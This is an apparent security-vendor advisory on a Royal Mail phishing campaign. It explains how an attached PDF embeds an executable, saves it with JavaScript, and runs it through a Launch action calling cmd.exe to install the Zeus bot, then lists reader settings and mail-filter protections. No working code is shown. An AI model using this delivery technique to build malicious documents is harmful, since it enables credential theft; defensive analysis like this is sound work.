Hi, Today we began seeing emails, like the one shown below, claiming to be from Royal Mail with an attached PDF file.
This PDF uses a feature, specified in the PDF format, known as a Launch action. A Launch action is intended to be used to run an application or opening or printing a document. Recently it has been discovered by a security researcher that this feature can be used to run an executable embedded within the PDF file. This PDF also contains an attachment (PDFs can have an attachment embedded within them, just like emails) named Royal_Mail_Delivery_Notice.pdf which has been compressed inside the PDF file. This attachment is actually an executable file and if run, will install the Zeus bot. The image below shows part of this attachment within the PDF file, the start of the executable file is shown decompressed, in the red box. The PDF uses the JavaScript function exportDataOject, shown below, to save a copy of the attachment to the user’s PC. When this PDF is opened In Adobe Reader with JavaScript enabled, the exportDataOject function causes a dialog box to be displayed asking the user to “Specify a file to extract to”. The default file is the name of the attachment, Royal_Mail_Delivery_Notice.pdf. This could be somewhat confusing to users, and not really knowing what is happening, they may just click save (It appears as if they are just saving a PDF file after all). Users of Foxit PDF reader will get no warning and the attachment will be saved to the users Documents folder. Once the exportDataOject function has completed, the Launch action is run. The Launch action is used to execute the Windows command interpreter (cmd.exe) and is given a command line to execute. This command line searches for the previously saved Royal_Mail_Delivery_Notice.pdf file in some commonly used folders such as My Documents and Desktop and then tries to run the file. (Remember that this is actually the executable file). Adobe Reader will pop up the box shown below and the command will only be run it the user clicks ‘Open’. The latest version of Foxit reader (released April 1st) will display a similar warning, older versions will go ahead and execute the command without asking. If this command if successfully run, the Zeus data stealing bot is installed. Although having the latest versions of Foxit and Adobe reader will not protect you entirely from this feature, they do offer configuration settings and warnings before any program is launched. In Adobe reader you can disable the opening of non-PDF attachments using the trust manager in the preferences menu. You can also disable JavaScript in both readers to mitigate the impact of this and many other vulnerabilities. MailMarshal users with the Block Executable rule enabled will be protected from PDF attachments with executable attachments. SpamCensor version 431 and KnownThreats version 26 both protect MailMarshal users from PDFs using this Launch action and Executable attachment feature. -- You received this message because you are subscribed to the Google Groups "nforceit" group. To post to this group, send an email to [email protected]. To unsubscribe from this group, send email to [email protected]. For more options, visit this group at http://groups.google.com/group/nforceit?hl=en-GB.
